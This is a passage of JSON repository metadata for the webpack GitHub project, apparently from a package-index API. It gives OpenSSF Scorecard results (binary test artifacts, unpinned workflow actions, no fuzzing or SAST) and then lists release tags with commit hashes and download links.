test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ec